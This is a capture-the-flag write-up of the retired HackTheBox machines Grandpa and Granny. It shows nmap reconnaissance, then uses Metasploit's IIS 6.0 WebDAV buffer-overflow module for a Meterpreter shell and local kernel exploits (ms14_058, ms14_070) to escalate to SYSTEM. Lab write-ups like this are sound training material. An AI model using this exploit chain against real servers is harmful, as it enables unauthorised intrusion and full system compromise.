This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Grandpa
Difficulty: Easy
Machine IP: 10.10.10.14
Granny
Difficulty: Easy
Machine IP: 10.10.10.15
Grandpa and Granny are so similar that you can exploit them both using the same commands. For this reason, I’ve listed them together in this write up. The commands will interchangeably reference 10.10.10.14
or 10.10.10.15
, since these services are essentially the same.
Starting our port scan:
sudo nmap -sS -T4 --top-ports 1000 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 00:01 EDT
Nmap scan report for 10.10.10.15
Host is up (0.050s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
Every other TCP port (using -p-
) is filtered, as well as the top 20 UDP ports, so I’m assuming all we have is this web server on port 80.
Interrogating the server with -sC -sV
, we get:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Tue, 05 May 2020 03:17:37 GMT
|_ Server Type: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
So this is an IIS server version 6.0. I pull up this exploit on Exploit-DB. It targets IIS 6.0 servers by exploiting a buffer overflow in the ScStoragePathFromUrl
function in the WebDav service. And it has a Metasploit module: windows/iis/iis_webdav_scstoragepathfromurl
.
Executing this module gives us a Meterpreter shell as NT AUTHORITY\NETWORK SERVICE
. We still need to escalate to a non-service user and/or SYSTEM.
We can determine the users on the box with:
net users
User accounts for \\GRANNY
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
SUPPORT_388945a0
The command completed successfully.
And on Grandpa:
User accounts for \\GRANPA
-------------------------------------------------------------------------------
Administrator ASPNET Guest
Harry IUSR_GRANPA IWAM_GRANPA
SUPPORT_388945a0
The command completed successfully.
So the Grandpa user is Harry
and the Granny user is Lakis
.
Let’s use post/multi/recon/local_exploit_suggester
to identify privilege escalation vectors.
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 30 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
On Grandpa, I got a system shell with windows/local/ms14_058_track_popup_menu
. On Granny, I opted to use windows/local/ms14_070_tcpip_ioctl
. Which you choose doesn’t really matter - both systems are vulnerable and both exploits give you a root shell.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
From here we can collect the user and root flags on both machines.